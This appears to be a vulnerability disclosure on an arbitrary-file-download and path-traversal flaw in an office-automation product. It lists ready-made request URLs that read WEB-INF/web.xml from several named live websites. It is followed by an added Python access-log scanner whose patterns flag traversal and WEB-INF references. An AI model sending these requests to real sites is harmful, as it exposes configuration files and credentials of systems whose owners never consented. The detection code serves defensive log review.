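### Brief description:
Two instances.
### Details:
Judging by a comparison of the page styling, this appears to be the following product from the vendor's official site: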
http://www.threeoa.com/product/501.html
There are probably quite a few deployments!
First file download:
http://www.jmsyz.net/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
[![d1.jpg](https://images.seebug.org/upload/201406/26163044bcbd7e3fe5519ecb3ccd679c4ca04bf4.jpg)](https://images.seebug.org/upload/201406/26163044bcbd7e3fe5519ecb3ccd679c4ca04bf4.jpg)
http://jdyz.ijd.cn/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
http://www.wxxqml.com/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
http://www.sxxazx.com:2012/eeoaftp/downloadFile.action?path=WEB-INF/web.xml
### Proof of vulnerability:
Second file download:
http://www.jmsyz.net/findPortalNewsBycategoryIdAndTopPortalNewsAction.action?bg=background6&categoryId=jms-11&displayMode=wordList&from=index&num=8&picHight=&picWidth=&proportionVal=1&showDate=0&showMore=0&showTitle=0&siteId=../WEB-INF/web.xml%3f&wordSize=
[![d2.jpg](https://images.seebug.org/upload/201406/26163435c0df20b795ec1107778802be29d882c2.jpg)](https://images.seebug.org/upload/201406/26163435c0df20b795ec1107778802be29d882c2.jpg)
Substituting any of the domains from the first instance above also works.
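
For reviewing access logs for the two request shapes shown above, the following added example (not part of the original report) decodes each query parameter and flags values that reference `WEB-INF`/`META-INF` or contain a `..` segment. The log lines are constructed, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Directories of a Java web application that should never be served to clients.
PROTECTED = re.compile(r"(^|/)(WEB-INF|META-INF)(/|$)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def normalize(value):
    """Decode repeatedly (catches double encoding) and unify path separators."""
    for _ in range(3):
        value = unquote(value)
    return value.replace("\\", "/")

def suspicious_params(request_target):
    """Return [(parameter, reason)] for query values that look like file reads."""
    findings = []
    query = urlsplit(request_target).query
    for name, raw in parse_qsl(query, keep_blank_values=True):
        # The siteId value on this page ends in an encoded '?' (%3f); drop it
        # and anything after it so only the path portion is inspected.
        path_part = normalize(raw).split("?", 1)[0]
        if ".." in path_part.split("/"):
            findings.append((name, "parent-directory traversal"))
        if PROTECTED.search(path_part):
            findings.append((name, "protected directory reference"))
    return findings

def scan_access_log(lines):
    """Return [(line_number, findings)] for log lines with at least one finding."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = suspicious_params(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed sample lines; addresses, timestamps and sizes are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /eeoaftp/downloadFile.action'
    '?path=WEB-INF/web.xml HTTP/1.1" 200 4312',
    '192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /findPortalNewsBycategoryIdAnd'
    'TopPortalNewsAction.action?siteId=../WEB-INF/web.xml%3f&wordSize= HTTP/1.1" 200 4312',
    '192.0.2.77 - - [01/Jan/2024:10:01:00 +0000] "GET /eeoaftp/downloadFile.action'
    '?path=docs/schedule.pdf HTTP/1.1" 200 88211',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

A 200 response on a flagged line is the case to investigate first, since it suggests the file was actually returned.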